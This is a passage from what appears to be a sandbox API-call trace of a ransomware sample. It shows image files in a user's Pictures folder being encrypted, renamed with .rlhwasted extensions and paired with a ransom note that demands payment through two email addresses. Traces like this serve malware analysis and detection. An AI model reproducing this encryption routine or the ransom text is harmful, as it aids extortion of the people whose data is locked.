hHeap=0x6b0000) returned 1 [0195.810] CloseHandle (hObject=0x124) returned 1 [0195.818] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.818] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f1cf0 | out: hHeap=0x6b0000) returned 1 [0195.818] _aulldvrm () returned 0x0 [0195.818] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0195.819] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.819] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.819] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\VumtGvr7JZo3c.bmp") returned 65 [0195.819] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28c) returned 0x6d4580 [0195.819] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.820] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.820] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0195.918] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.918] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\VumtGvr7JZo3c.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\vumtgvr7jzo3c.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.919] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.921] SetEndOfFile (hFile=0x124) returned 1 [0195.921] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.921] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.921] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\VumtGvr7JZo3c.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\vumtgvr7jzo3c.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\VumtGvr7JZo3c.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\vumtgvr7jzo3c.bmp.rlhwasted")) returned 1 [0195.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\VumtGvr7JZo3c.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\vumtgvr7jzo3c.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.922] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0195.922] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x3362 [0195.922] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3362) returned 0x6a0000 [0195.923] CloseHandle (hObject=0x12c) returned 1 [0195.925] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0195.927] CloseHandle (hObject=0x128) returned 1 [0195.927] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0195.927] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0195.928] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0195.928] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.928] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0195.929] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.929] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.940] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x703f50 [0195.940] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0195.940] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0195.940] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]S91IHaCO5MjSvQa8k6RSg8+aYFUp9R+PoPB3uVgG+qY3HAHjb4Pzq0+HHshCxZQC\r\ndhMKyjCkTMGuLtMgOh5meD2X+qnSnXE/4Ueuzq9H3g3n0jgmDpDG160KQg6jgHhh\r\noy6YZuW5wl627Nk66yPKMTqL98R0f4eoAL8Hl0F02gG/9IOWbRZ6MEdc4di99RLC\r\nNB36XHqioyU9a6HZIZGyd16TukxrazlpiVGWpuk658TAuEz2rOoqyj2WGe0Aeebq\r\ngn96VTigqlxbHtwdrVTDqLR8UQKrSpaFy5sJNjUzO+MWiUE4g+N3MQFNGQvgqg02\r\nm43OlDI7hH3vC4BGJctRaX9cOwSlyF5bRtMDi6JqVYmnpXSl2wKpTEO33QaAs+ay\r\ngvPCRf0KQe9XgtA9TYqvwK2QTa4POulRbP3VqdL4u6AAHOACY2BbSPUzSHLQ+8NL\r\nffJcP2nRkXDuIMZfUAtc0PsoeUTs5iPM17yar6+4YXJO+eqXWOrE5Ou06meAcZA4\r\nfI/amG+ayGX/VwZwDd3KI0ipuesErDNGZNddz6zSJ7GJEF7A7WkIV/DjGp9Ce2rq\r\nqdMz/ZN1btGtObv5Tk5ozmFFgsCt7mvS+EZ+WqPiAVd4pIcVGPHARCipCwjKCFV8\r\nc8FEREpzht40O2xkxofiri+FJIMBXMaQT1rI5KAR/SA=[end_key]\r\nKEEP IT\r\n") returned 981 [0195.940] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.940] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0195.940] SetEndOfFile (hFile=0x124) returned 1 [0195.943] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0195.943] CloseHandle (hObject=0x124) returned 1 [0195.945] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.946] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f1dd0 | out: hHeap=0x6b0000) returned 1 [0195.946] _aulldvrm () returned 0x0 [0195.946] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0195.947] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.947] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\FAeC.gif") returned 66 [0195.947] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28e) returned 0x6e8b80 [0195.947] lstrcpyW (in: lpString1=0x6e8c04, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.947] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.947] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0195.948] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.948] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\FAeC.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\faec.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.949] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.951] SetEndOfFile (hFile=0x124) returned 1 [0195.951] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.951] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.951] lstrcpyW (in: lpString1=0x6e8c04, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.951] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\FAeC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\faec.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\FAeC.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\faec.gif.rlhwasted")) returned 1 [0195.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\FAeC.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\faec.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.953] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.953] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x162f6 [0195.953] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x162f6) returned 0xb00000 [0195.953] CloseHandle (hObject=0x128) returned 1 [0195.959] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0195.960] CloseHandle (hObject=0x12c) returned 1 [0195.960] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0195.960] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0195.994] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0195.994] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.994] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0195.995] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.995] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.005] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0196.006] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.006] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.006] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HzcGCPri9KXJtbjAVwb680klqll3M48aWHaMHh+zh4fzfXLmH17oSVorWHkyum3/\r\nj/V2x251gT3qanSgh6aZ2plGPU8Dhd0Ga27kx7z9QrvHctNYdRqvhrBzESgfCHua\r\nyxN5E98jpmgQ2DaQ+1stKW8kqRUqUtNga8mXde+tuq/WyWyYW8UWZ/nMRUozJyf0\r\nFSJuPl8XMENF9INGQqBjcdSq1j5JpCcDPzD4JkN53gkza/l1Boikrfz/DCEiaY48\r\n29qO4VgAIzQ/PlsY295rykt9GOO5XRNVccVYrAaJrN6zw8hQyQJahCYey+E0l10+\r\nvi82qsabJ2hZp8vA9sYKZ7sBL83u6mGqt7Pp/9pToaUyEk0VrWa3e+WESlnrWgcQ\r\nr5c0CQuCKhswgzk8fjAlOXsH8ymomkZTWTJSz4hJHSfv4Cy+LY3FEKg7Ss6KQeh6\r\nPbUfq7sYUO0G444tc8e+QHnZ/HgGm+cRGeDld2gZptoP82uv33Evzt0KhhqP4sbK\r\nwnSmvJAAXL9rBea528YUQCU4hRCd9RZ85nBnBUL48gwDw4BviTF+mbZ8R0zDjrw6\r\neakgUz4fn393+0ITQM73QCZmmYUQsJsYyFc/rxHZbVemtDJnyOcazTq6lZe/dtWz\r\nCoxYxsr8KSr4tFOu4qRLr8MGZrCF8VENeK/5PsuMOZO=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.006] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0196.006] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.006] SetEndOfFile (hFile=0x124) returned 1 [0196.009] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.009] CloseHandle (hObject=0x124) returned 1 [0196.012] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8b80 | out: hHeap=0x6b0000) returned 1 [0196.012] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f1eb0 | out: hHeap=0x6b0000) returned 1 [0196.012] _aulldvrm () returned 0x0 [0196.012] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.013] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.013] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\FXZFgJe.png") returned 90 [0196.013] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2be) returned 0x70cfe8 [0196.014] lstrcpyW (in: lpString1=0x70d09c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.014] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.014] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.015] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.015] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\FXZFgJe.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\fxzfgje.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.016] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.017] SetEndOfFile (hFile=0x124) returned 1 [0196.017] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.017] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.017] lstrcpyW (in: lpString1=0x70d09c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\FXZFgJe.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\fxzfgje.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\FXZFgJe.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\fxzfgje.png.rlhwasted")) returned 1 [0196.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\FXZFgJe.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\jgtiyn1dvgvn23m9e0ul\\fxzfgje.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0196.019] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.019] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x153b6 [0196.019] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x153b6) returned 0xb00000 [0196.020] CloseHandle (hObject=0x12c) returned 1 [0196.025] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.026] CloseHandle (hObject=0x128) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e7f18 [0196.026] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.027] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7f60 | out: pbBuffer=0x6e7f60) returned 1 [0196.027] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.027] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.028] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.028] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.038] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.038] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.038] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.038] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]T24mLUyobCuUKFgy8c5BXZfWBf3zYKWytnGvv47y7I4rkKz1AoWRp+vpXwnZwVbk\r\n+NngSvVSAWfm3FNWrsG7Ff8QU8GhY6FdDb9D86Rlb5kgxtPwNLM3UrHbItmFmeaz\r\npfUdbidposWqTy5I1bXoT7hQaNJ2/gnh+JEchrb/YMk0SOQU05bOIDYf5ZooidNf\r\njq79mO9TTdcU7/NmwhUeUqu86VtgM+TosEMR1Vuf0hVlO8MF2DKNRJGoru36uxmD\r\n+8FL3sup6oOFS+S0tvSuKWJVNezMtwZeWE8zvrN1UBNz+2rACuRgy5B9lP3JuRrN\r\nwEGnptublY9izGQLVKejfgI3FJ1D9dDpnMc5lQ+QYSMzEfZZ3gEuUihvz4NffQhl\r\n4qR5G8kLZB0GBXEu3t0fFj6dbMtD2WzU14Zu8e3GgzrD9fMHUQu5lrYctUb+hiU1\r\nerCMVZqQuBILvR8pi2ll3dZ8PPipDLp7V9eJD+6oAmkuS5WFWGb/wNrnwBNmPJYF\r\nQq8/IlLRmVIwVM0lj7zcibVJ2mXePhqQIl9EYZ88eXTQeEpY1hsZ3JxykQJpqnnX\r\ntWvol3EaFQwQydH9QpvmLPOFs0bncaFVjSnbLbhH/hvdOrwKfoknoAeqRJPq9DTt\r\nPlFSMI4xhdCst1nQeJOCMcvsGHfg3E8/PCf3a2t40qh=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.039] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.039] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.087] SetEndOfFile (hFile=0x124) returned 1 [0196.089] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.090] CloseHandle (hObject=0x124) returned 1 [0196.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0196.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e84a0 | out: hHeap=0x6b0000) returned 1 [0196.092] _aulldvrm () returned 0x0 [0196.092] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.093] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.093] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\_X55MK5gOL-HtkzFDw.jpg") returned 101 [0196.093] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2d4) returned 0x6e7988 [0196.093] lstrcpyW (in: lpString1=0x6e7a52, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.093] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.093] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.094] CryptGenRandom (in: hProv=0x6f6f10, 